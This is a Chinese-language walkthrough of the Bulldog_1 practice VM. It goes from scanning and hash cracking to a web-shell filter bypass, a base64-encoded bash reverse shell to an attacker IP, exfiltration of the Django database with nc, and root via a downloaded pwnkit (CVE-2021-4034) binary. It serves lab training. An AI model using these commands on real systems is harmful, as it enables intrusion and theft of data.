Bulldog_1 靶机

Bulldog_1 靶机

信息收集

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.56.123
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-02 23:49 EDT
Nmap scan report for 192.168.56.123
Host is up (0.00028s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
23/tcp   open  telnet
80/tcp   open  http
8080/tcp open  http-proxy
MAC Address: 08:00:27:07:AE:20 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 8.70 seconds
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
┌──(kali㉿kali)-[~/Downloads/bulldog]
└─$ sudo nmap --top-ports 20 -sU 192.168.56.123
[sudo] password for kali: 
Sorry, try again.
[sudo] password for kali: 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-03 02:26 EDT
Nmap scan report for 192.168.56.123
Host is up (0.00032s latency).

PORT      STATE         SERVICE
53/udp    closed        domain
67/udp    open|filtered dhcps
68/udp    open|filtered dhcpc
69/udp    open|filtered tftp
123/udp   closed        ntp
135/udp   closed        msrpc
137/udp   open|filtered netbios-ns
138/udp   closed        netbios-dgm
139/udp   closed        netbios-ssn
161/udp   closed        snmp
162/udp   open|filtered snmptrap
445/udp   open|filtered microsoft-ds
500/udp   closed        isakmp
514/udp   closed        syslog
520/udp   closed        route
631/udp   open|filtered ipp
1434/udp  open|filtered ms-sql-m
1900/udp  closed        upnp
4500/udp  open|filtered nat-t-ike
49152/udp closed        unknown
MAC Address: 08:00:27:07:AE:20 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 14.48 seconds

开放了 23,80,8080 端口,DUP 端口扫描结果没有特别需要注意的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -sC -O -p23,80,8080 192.168.56.123               
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-02 23:49 EDT
Nmap scan report for 192.168.56.123
Host is up (0.00035s latency).

PORT     STATE SERVICE VERSION
23/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 20:8b:fc:9e:d9:2e:28:22:6b:2e:0e:e3:72:c5:bb:52 (RSA)
|   256 cd:bd:45:d8:5c:e4:8c:b6:91:e5:39:a9:66:cb:d7:98 (ECDSA)
|_  256 2f:ba:d5:e5:9f:a2:43:e5:3b:24:2c:10:c2:0a:da:66 (ED25519)
80/tcp   open  http    WSGIServer 0.1 (Python 2.7.12)
|_http-title: Bulldog Industries
8080/tcp open  http    WSGIServer 0.1 (Python 2.7.12)
|_http-title: Bulldog Industries
MAC Address: 08:00:27:07:AE:20 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.33 seconds

这里可以判断出 23 端口是 ssh 端口,80 和 8080 端口似乎网页标题和搭建方式都是相同的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
┌──(kali㉿kali)-[~/Downloads/bulldog]
└─$ sudo nmap --script=vuln -p23,80,8080 192.168.56.123
[sudo] password for kali: 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-03 01:41 EDT
Nmap scan report for 192.168.56.123
Host is up (0.00035s latency).

PORT     STATE SERVICE
23/tcp   open  telnet
80/tcp   open  http
|_http-stored-xss: Couldn\'t find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn\'t find any DOM based XSS.
|_http-csrf: Couldn\'t find any CSRF vulnerabilities.
| http-fileupload-exploiter: 
|   
|     Couldn\'t find a file-type field.
|   
|_    Couldn\'t find a file-type field.
| http-enum: 
|   /robots.txt: Robots file
|_  /dev/: Potentially interesting folder
8080/tcp open  http-proxy
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server\'s resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
| http-enum: 
|   /robots.txt: Robots file
|_  /dev/: Potentially interesting folder
MAC Address: 08:00:27:07:AE:20 (Oracle VirtualBox virtual NIC)

看到 80 和 8080 端口枚举的结果也是相同的

Web 查看

接下来先只看 80 端口进行网页查看

80 端口的网页中,网站建立者说明了一件事:遭受了攻击,给了个公开说明的链接

说明中透漏了一些信息:黑客通过 shell 连接后使用脏牛漏洞进行提权,和一个用户名 Churchy。之前 nmap 枚举出了一些目录或者文件,进行查看,同时开启 dirsearch 目录爆破

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
┌──(kali㉿kali)-[~/Downloads/bulldog]
└─$ sudo dirsearch -u http://192.168.56.123        
[sudo] password for kali: 

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/192.168.56.123/_23-07-03_01-45-30.txt

Error Log: /root/.dirsearch/logs/errors-23-07-03_01-45-30.log

Target: http://192.168.56.123/

[01:45:30] Starting: 
[01:45:37] 301 -    0B  - /admin  ->  http://192.168.56.123/admin/          
[01:45:37] 302 -    0B  - /admin/  ->  http://192.168.56.123/admin/login/?next=/admin/
[01:45:37] 302 -    0B  - /admin/?/login  ->  http://192.168.56.123/admin/login/?next=/admin/%3F/login
[01:45:38] 301 -    0B  - /admin/login  ->  http://192.168.56.123/admin/login/
[01:45:46] 301 -    0B  - /dev  ->  http://192.168.56.123/dev/              
[01:45:46] 200 -    3KB - /dev/                                             
[01:45:58] 200 -    1KB - /robots.txt                                  
Task Completed

robots.txt 中是个黑客攻破后留下的团队的标志,那 dev 目录呢

给了更详细的信息,归纳一下:这应该是开发者团队对新员工的说明和培训,PHP 被移除了服务器,不会用流行度很高的 cms 和管理工具,而是用自己开发的工具。有个 webshell 的接口以后会取代 ssh 连接,MongoDB 还没有被安装好,公司买了个新的入侵检测系统,还给了个 webshell 的链接

点进去提示没有经过验证,看一看开发团队网页的源代码

哈希值竟然直接写在了里面,使用在线工具破解吧

有两个用户的密码碰撞了出来,sarah:bulldoglovernick:bulldog 尝试 ssh 登录但是失败。

实际上这里我一开始只使用控制台看了一眼折叠起来的源码,没有直接查看网页源代码,所以在这里卡了很久,针对下方的登录界面尝试了一些 Django 的漏洞,包括 CVE-PoC/Django at main · HxDDD/CVE-PoC · GitHub 中的三个,但是都没有成功。所以使用 burp suite 的 Cluster bomb 模式来爆破,用户名就是刚才页面里邮箱的用户名,密码使用的是 burp suite 的默认密码列表,得到了 nick:bulldog 这样一对登录凭证

Getshell

回到目录扫描的结果,其中有登录的 URL

尝试用上面两个用户进行登录,nick:bulldog 登录成功,但是界面却提示没有权限编辑任何东西

那这里似乎突破口不是很明显,回到/dev 目录看看呢,竟然有了个 webshell 的界面

编码 Getshell

尝试了一下,发现有简单的过滤,whoami,bash 等命令被过滤了,那就 base64 编码后再执行

1
2
3
4
5
6
7
8
┌──(kali㉿kali)-[~/Downloads/bulldog]
└─$ echo '/bin/bash -c "bash -i >& /dev/tcp/192.168.56.106/443 0>&1"' |base64
L2Jpbi9iYXNoIC1jICJiYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguNTYuMTA2LzQ0MyAwPiYx
          
┌──(kali㉿kali)-[~/Downloads/bulldog]
└─$ echo "L2Jpbi9iYXNoIC1jICJiYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguNTYuMTA2LzQ0MyAwPiYxIgo=" | base64 -d
/bin/bash -c "bash -i >& /dev/tcp/192.168.56.106/443 0>&1"

根据上方结果,构造出:

1
echo "L2Jpbi9iYXNoIC1jICJiYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguNTYuMTA2LzQ0MyAwPiYxIgo=" | base64 -d | bash

提前开启监听,然后再网页中执行

成功反弹 shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
┌──(kali㉿kali)-[~]
└─$ sudo nc -lvnp 443    
[sudo] password for kali: 
listening on [any] 443 ...
connect to [192.168.56.106] from (UNKNOWN) [192.168.56.123] 48748
bash: cannot set terminal process group (976): Inappropriate ioctl for device
bash: no job control in this shell
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

bash: /root/.bashrc: Permission denied
django@bulldog:/home/django/bulldog$whoami
whoami
django
django@bulldog:/home/django/bulldog$ id
id
uid=1001(django) gid=1001(django) groups=1001(django),27(sudo)
django@bulldog:/home/django/bulldog$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 08:00:27:07:ae:20 brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.123/24 brd 192.168.56.255 scope global enp0s3
       valid_lft forever preferred_lft forever
    inet6 fe80::a00:27ff:fe07:ae20/64 scope link 
       valid_lft forever preferred_lft forever
django@bulldog:/home/django/bulldog$ uname -a
uname -a
Linux bulldog 4.4.0-87-generic #110-Ubuntu SMP Tue Jul 18 12:55:35 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

确定目标反弹成功,并且知道了内核版本号,接下来完善一下 shell

1
2
3
4
5
6
7
8
django@bulldog:/home/django/bulldog$ python -c "import pty;pty.spawn('/bin/bash')"
</bulldog$ python -c "import pty;pty.spawn('/bin/bash')"                     
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

bash: /root/.bashrc: Permission denied
django@bulldog:/home/django/bulldog$ export TERM=xterm
export TERM=xterm

提权

信息收集

那先看看当前目录下有什么

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
django@bulldog:/home/django/bulldog$ ls
ls
bulldog  db.sqlite3  manage.py
django@bulldog:/home/django/bulldog$ cat manage.py
cat manage.py
#!/usr/bin/env python
import os
import sys

if __name__ == "__main__":
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "bulldog.settings")

    from django.core.management import execute_from_command_line

    execute_from_command_line(sys.argv)

有个 db.sqlite3 文件,将其通过 nc 发送到攻击机上,攻击机使用 sudo nc -lv -p 333 > db.sqlite3,靶机使用 nc -nv 192.168.56.106 333 < db.sqlite3 来发送文件

1
2
3
django@bulldog:/home/django/bulldog$ nc -nv 192.168.56.106 333 < db.sqlite3
nc -nv 192.168.56.106 333 < db.sqlite3
Connection to 192.168.56.106 333 port [tcp/*] succeeded!

sqlite3 数据库文件查看

这里搜了下 sqlite3 数据库文件如何查看

  • sqlite3+文件名打开文件
  • .tables 查看所有的表
  • .schema 查看表结构
  • select * from 表名;
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    ┌──(kali㉿kali)-[~/Downloads/bulldog]
    └─$ sqlite3 db.sqlite3  
    SQLite version 3.40.1 2022-12-28 14:03:47
    Enter ".help" for usage hints.
    sqlite>.tables
    auth_group                  auth_user_user_permissions
    auth_group_permissions      django_admin_log          
    auth_permission             django_content_type       
    auth_user                   django_migrations         
    auth_user_groups            django_session
    sqlite> select * from auth_user;
    1|pbkdf2_sha256$20000$9k0TYJltYWk5$rE0aQA4DGFxEjBhBH0BEJhFsF2Jx63690a8VGE/9a+c=|1|admin|||admin@bulldogindustries.com|1|1|2017-08-18 22:42:27.888865|2017-08-19 06:14:22.419010
    3|pbkdf2_sha256$20000$AvMG3SPMFdWk$br74kiJcinPLKkqG+i9G+2MavMVW9IXDl2TSeQ5My+A=|0|alan||||1|1|2017-08-19 05:57:32|
    4|pbkdf2_sha256$20000$LgCCwZ1qFhSK$xv2NHkto76GEp11lXNUFPsiolvoV8c8R/PRl2/XccX0=|0|william||||1|1|2017-08-19 06:02:07|
    5|pbkdf2_sha256$20000$IjvfpwWo8tw9$9PZgYsZCcRz3dLVU/4TnXa9i2VcybBnBedCyNjk3Sak=|0|malik||||1|1|2017-08-19 06:02:50|
    6|pbkdf2_sha256$20000$ooicdWHyxlTk$oNMBAZDKarihoPIzzYAhDq+4cR8JtJGt9JQIA8q1SX8=|0|kevin||||1|1|2017-08-19 06:03:22|
    7|pbkdf2_sha256$20000$nmdkvhu3yqa9$8VSo44h9fXYj6FLavolYDZ7P5PhFBLeKBmLkBlNpGTk=|0|ashley||||1|1|2017-08-19 06:04:18|
    8|pbkdf2_sha256$20000$QFeEaqreqK8o$ldGl5qhFnyB+tFrOflSwxSGO3Xt/mL4sjBiCPyPusU4=|0|nick||||1|1|2017-08-19 06:06:08|2023-07-03 07:32:15.318467
    9|pbkdf2_sha256$20000$lA6iOt4XGXLw$0VHpbYjNiFN4CnHisuB+bFh72A6sn03Q+d34Laj7jkM=|0|sarah||||1|1|2017-08-19 06:06:56|
    sqlite> select * from auth_permission;
    1|1|add_logentry|Can add log entry
    2|1|change_logentry|Can change log entry
    3|1|delete_logentry|Can delete log entry
    4|2|add_permission|Can add permission
    5|2|change_permission|Can change permission
    6|2|delete_permission|Can delete permission
    7|3|add_group|Can add group
    8|3|change_group|Can change group
    9|3|delete_group|Can delete group
    10|4|add_user|Can add user
    11|4|change_user|Can change user
    12|4|delete_user|Can delete user
    13|5|add_contenttype|Can add content type
    14|5|change_contenttype|Can change content type
    15|5|delete_contenttype|Can delete content type
    16|6|add_session|Can add session
    17|6|change_session|Can change session
    18|6|delete_session|Can delete session
    sqlite> select * from django_admin_log;
    1|2017-08-18 22:44:28.935362|2|alan|1||4|1
    2|2017-08-19 05:52:32.978087|2|alan|3||4|1
    3|2017-08-19 05:57:32.723768|3|alan|1||4|1
    4|2017-08-19 06:02:07.988633|4|william|1||4|1
    5|2017-08-19 06:02:50.604910|5|malik|1||4|1
    6|2017-08-19 06:03:22.814721|6|kevin|1||4|1
    7|2017-08-19 06:04:18.210702|7|ashley|1||4|1
    8|2017-08-19 06:06:08.629082|8|nick|1||4|1
    9|2017-08-19 06:06:56.356511|9|sarah|1||4|1
    10|2017-08-19 06:13:55.722525|8|nick|2|Changed password.|4|1
    11|2017-08-19 06:14:50.804394|3|alan|2|Changed is_staff.|4|1
    12|2017-08-19 06:14:57.811418|7|ashley|2|Changed is_staff.|4|1
    13|2017-08-19 06:15:08.187751|6|kevin|2|Changed is_staff.|4|1
    14|2017-08-19 06:15:18.199899|5|malik|2|Changed is_staff.|4|1
    15|2017-08-19 06:15:25.607889|8|nick|2|Changed is_staff.|4|1
    16|2017-08-19 06:15:32.692866|9|sarah|2|Changed is_staff.|4|1
    17|2017-08-19 06:15:42.247879|4|william|2|Changed is_staff.|4|1

翻看了一下,密码是经过 pbkdf2_sha256 哈希的,碰撞难度较大,只能算是拿到了一些用户名。回到刚才的 shell 中,继续进行信息收集,在当前目录的子目录下,找到一个 settings.py 文件,其中有个 secret_key,但是搜索了一下似乎没法用来提权

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
django@bulldog:/home/django/bulldog/bulldog$ cat settings.py
"""
Django settings for bulldog project.

Generated by 'django-admin startproject' using Django 1.8.7.

For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/

For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""

# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os

BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))


# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/

# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '%9a3ph3iwk$v*_#x4ejg8(t5(qll0fl8q8&u+o_g$yi83d*riq'

定时任务和SUID

看看定时任务

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
django@bulldog:/$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

看看 s 权限文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
django@bulldog:/home/django$ find / -type f -perm -04000 -ls 2>/dev/null
find / -type f -perm -04000 -ls 2>/dev/null
   407927     44 -rwsr-xr--   1 root     messagebus    42992 Jan 12  2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
   278771     40 -rwsr-xr-x   1 root     root          38984 Jun 14  2017 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
   280147     16 -rwsr-xr-x   1 root     root          14864 Jan 17  2016 /usr/lib/policykit-1/polkit-agent-helper-1
   279434    420 -rwsr-xr-x   1 root     root         428240 Mar 16  2017 /usr/lib/openssh/ssh-keysign
   262725     12 -rwsr-xr-x   1 root     root          10232 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
   280225    204 -rwsr-xr-x   1 root     root         208680 Apr 29  2017 /usr/lib/snapd/snap-confine
   262540     56 -rwsr-xr-x   1 root     root          54256 May 16  2017 /usr/bin/passwd
   280156     24 -rwsr-xr-x   1 root     root          23376 Jan 17  2016 /usr/bin/pkexec
   262529     40 -rwsr-xr-x   1 root     root          39904 May 16  2017 /usr/bin/newgrp
   279685     52 -rwsr-sr-x   1 daemon   daemon        51464 Jan 14  2016 /usr/bin/at
   262624    136 -rwsr-xr-x   1 root     root         136808 Jul  4  2017 /usr/bin/sudo
   278786     36 -rwsr-xr-x   1 root     root          32944 May 16  2017 /usr/bin/newuidmap
   262404     40 -rwsr-xr-x   1 root     root          40432 May 16  2017 /usr/bin/chsh
   278787     36 -rwsr-xr-x   1 root     root          32944 May 16  2017 /usr/bin/newgidmap
   262465     76 -rwsr-xr-x   1 root     root          75304 May 16  2017 /usr/bin/gpasswd
   262402     52 -rwsr-xr-x   1 root     root          49584 May 16  2017 /usr/bin/chfn
   131149     44 -rwsr-xr-x   1 root     root          44168 May  7  2014 /bin/ping
   131135     40 -rwsr-xr-x   1 root     root          40152 Jun 14  2017 /bin/mount
   131184     28 -rwsr-xr-x   1 root     root          27608 Jun 14  2017 /bin/umount
   131166     40 -rwsr-xr-x   1 root     root          40128 May 16  2017 /bin/su
   131150     44 -rwsr-xr-x   1 root     root          44680 May  7  2014 /bin/ping6
   133809     32 -rwsr-xr-x   1 root     root          30800 Jul 12  2016 /bin/fusermount
   133812    140 -rwsr-xr-x   1 root     root         142032 Jan 28  2017 /bin/ntfs-3g

有 polkit-agent-helper-1和 pkexec,应该可以使用 CVE-2021-4034,不过还是一步一步尝试有没有别的攻击路径,/bin/ntfs-3g 是第一次见到,搜索一下的确有个脚本:ntfs-3g (Debian 9) - Local Privilege Escalation - Linux local Exploit (exploit-db.com)

尝试运行,但是并没有成功,错误信息如下

1
2
3
4
[-] FAILED: your need make / build tools
./41240.sh: line 61: /tmp/r00t: No such file or directory
./41240.sh: line 62: /tmp/r00t: No such file or directory

看了眼源码,应该是没有利用成功,没复制 bash 文件到 tmp 中,导致最后找不到文件。

隐藏文件查找

看看可写文件吧

1
2
3
django@bulldog:/home/django$ find / -type f -writable -not -path "/proc/*" -not -path "/home/*" -not -path "/sys*" 2>/dev/null
< -not -path "/proc/*" -not -path "/home/*" -not -path "/sys*" 2>/dev/null   
/.hiddenAVDirectory/AVApplication.py

根目录下有个可写的脚本文件,看看这个文件的信息吧

1
2
3
4
5
6
7
8
9
10
11
django@bulldog:/home/django$ ls -liah /.hiddenAVDirectory/AVApplication.py
ls -liah /.hiddenAVDirectory/AVApplication.py
141860 -rwxrwxrwx 1 root root 157 Aug 26  2017 /.hiddenAVDirectory/AVApplication.py
django@bulldog:/home/django$ cd /.hiddenAVDirectory
cd /.hiddenAVDirectory
django@bulldog:/.hiddenAVDirectory$ ls -liah
ls -liah
total 12K
131483 drwxr-xr-x  2 root root 4.0K Aug 26  2017 .
     2 drwxr-xr-x 24 root root 4.0K Aug 26  2017 ..
141860 -rwxrwxrwx  1 root root  157 Aug 26  2017 AVApplication.py

这个应该就是之前提过的入侵检测程序,不过有点简陋,而且权限是 777,感觉可能是个突破点,但是如果没有找到调用它的方式那也无济于事,ps auxnetsat -a 翻找了一下没有发现可利用的点。刚开始觉得这个文件或许有突破口花了不少心思排除,浪费了不少时间。

接下来就逐层文件夹翻翻吧,首先看看 home 目录下的文件夹

1
2
3
4
5
6
7
django@bulldog:/home$ ls -liah
ls -liah
total 16K
    12 drwxr-xr-x  4 root         root         4.0K Aug 24  2017 .
     2 drwxr-xr-x 24 root         root         4.0K Aug 26  2017 ..
   687 drwxr-xr-x  5 bulldogadmin bulldogadmin 4.0K Sep 21  2017 bulldogadmin
131698 drwxr-xr-x  5 django       django       4.0K Sep 21  2017 django

home 目录下只有两个文件夹:django 和 bulldogadmin,进入 bulldogadmin 查看

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
django@bulldog:/home$ cd bulldogadmin
cd bulldogadmin
django@bulldog:/home/bulldogadmin$ ls -liah
ls -liah
total 40K
   687 drwxr-xr-x 5 bulldogadmin bulldogadmin 4.0K Sep 21  2017 .
    12 drwxr-xr-x 4 root         root         4.0K Aug 24  2017 ..
 16091 -rw-r--r-- 1 bulldogadmin bulldogadmin  220 Aug 24  2017 .bash_logout
 16190 -rw-r--r-- 1 bulldogadmin bulldogadmin 3.7K Aug 24  2017 .bashrc
 16850 drwx------ 2 bulldogadmin bulldogadmin 4.0K Aug 24  2017 .cache
141810 drwxrwxr-x 2 bulldogadmin bulldogadmin 4.0K Sep 21  2017 .hiddenadmindirectory
 16892 drwxrwxr-x 2 bulldogadmin bulldogadmin 4.0K Aug 25  2017 .nano
 16235 -rw-r--r-- 1 bulldogadmin bulldogadmin  655 Aug 24  2017 .profile
 16888 -rw-rw-r-- 1 bulldogadmin bulldogadmin   66 Aug 25  2017 .selected_editor
 16854 -rw-r--r-- 1 bulldogadmin bulldogadmin    0 Aug 24  2017 .sudo_as_admin_successful
 16232 -rw-rw-r-- 1 bulldogadmin bulldogadmin  217 Aug 24  2017 .wget-hsts
django@bulldog:/home/bulldogadmin$ cd .hiddenadmindirectory
cd .hiddenadmindirectory
django@bulldog:/home/bulldogadmin/.hiddenadmindirectory$ ls -liah
ls -liah
total 24K
141810 drwxrwxr-x 2 bulldogadmin bulldogadmin 4.0K Sep 21  2017 .
   687 drwxr-xr-x 5 bulldogadmin bulldogadmin 4.0K Sep 21  2017 ..
141862 -rw-r--r-- 1 bulldogadmin bulldogadmin 8.6K Aug 26  2017 customPermissionApp
141866 -rw-rw-r-- 1 bulldogadmin bulldogadmin  619 Sep 21  2017 note
django@bulldog:/home/bulldogadmin/.hiddenadmindirectory$ cat note
cat note
Nick,

I'm working on the backend permission stuff. Listen, it's super prototype but I think it's going to work out great. Literally run the app, give your account password, and it will determine if you should have access to that file or not! 

It's great stuff! Once I'm finished with it, a hacker wouldn't even be able to reverse it! Keep in mind that it's still a prototype right now. I am about to get it working with the Django user account. I'm not sure how I'll implement it for the others. Maybe the webserver is the only one who needs to have root access sometimes?

Let me know what you think of it!

-Ashley

有一段话,大意是开发了一个新的后端权限工具,输入账户密码就可以获取到文件的权限了,我尝试把文件下载到攻击机然后再上传到靶机的 tmp 目录,发现确实提示需要输入密码,使用 cat 命令查看 customPermissionApp 有很多乱码,所以使用 strings 命令查看

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
┌──(kali㉿kali)-[~/Downloads/bulldog]
└─$ strings customPermissionApp            
/lib64/ld-linux-x86-64.so.2
32S0-t
libc.so.6
puts
__stack_chk_fail
system
__libc_start_main
__gmon_start__
GLIBC_2.4
GLIBC_2.2.5
UH-H
SUPERultH
imatePASH
SWORDyouH
CANTget
dH34%(
AWAVA
AUATL
[]A\A]A^A_
Please enter a valid username to use root privileges
        Usage: ./customPermissionApp <username>
sudo su root

上面只列了一部分,给出了此文件的用法,执行的时候加上用户名即可,这里一开始没看出上面几行字中其实就藏着密码

CVE-2021-4034 提权

我是使用了刚才提到的 CVE-2021-4034 来进行的提权,所使用的编译好的二进制文件可以在这里找到dzonerzy/poc-cve-2021-4034: PoC for CVE-2021-4034 dubbed pwnkit (github.com)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
django@bulldog:/tmp$ wget http://192.168.56.106:8088/exploit
wget http://192.168.56.106:8088/exploit
--2023-07-03 09:30:45--  http://192.168.56.106:8088/exploit
Connecting to 192.168.56.106:8088... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4442423 (4.2M) [application/octet-stream]
Saving to: ‘exploit’

exploit             100%[===================>]   4.24M  --.-KB/s    in 0.03s   

2023-07-03 09:30:45 (129 MB/s) - ‘exploit’ saved [4442423/4442423]

django@bulldog:/tmp$ chmod +x exploit
chmod +x exploit
django@bulldog:/tmp$ ./exploit  
./exploit
2023/07/03 04:30:56 CMDTOEXECUTE is empty fallback to default value
2023/07/03 04:30:56 Executing command sh
# whoami
whoami
root
# cd /root
cd /root
# ls
ls
congrats.txt
# cat congrats.txt
cat congrats.txt
Congratulations on completing this VM :D That wasn't so bad was it?

Let me know what you thought on twitter, I'm @frichette_n

As far as I know there are two ways to get root. Can you find the other one?

Perhaps the sequel will be more challenging. Until next time, I hope you enjoyed!
# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 08:00:27:07:ae:20 brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.123/24 brd 192.168.56.255 scope global enp0s3
       valid_lft forever preferred_lft forever
    inet6 fe80::a00:27ff:fe07:ae20/64 scope link 
       valid_lft forever preferred_lft forever
# uname -a
uname -a
Linux bulldog 4.4.0-87-generic #110-Ubuntu SMP Tue Jul 18 12:55:35 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
# whoami
whoami
root

拆分组合隐藏的密码

其实是自己对英文的敏感度不够,没有看出这里其实是把有意义的单词进行拆分组合。

1
2
3
4
SUPERultH
imatePASH
SWORDyouH
CANTget

把 H 去掉,其他的连起来就是 SUPERultimatePASSWORDyouCANTget,翻译成中文就是超级中级密码,你不可能拿到。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
django@bulldog:/home/django/bulldog$ su -
su -                                                                                                                
Password: SUPERultimatePASSWORDyouCANTget                                                                           
                                                                                                                    
su: Authentication failure                                                                                          
django@bulldog:/home/django/bulldog$ sudo su root
sudo su root
[sudo] password for django: SUPERultimatePASSWORDyouCANTget

root@bulldog:/home/django/bulldog# whoami
whoami
root
root@bulldog:/home/django/bulldog# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 08:00:27:07:ae:20 brd ff:ff:ff:ff:ff:ff
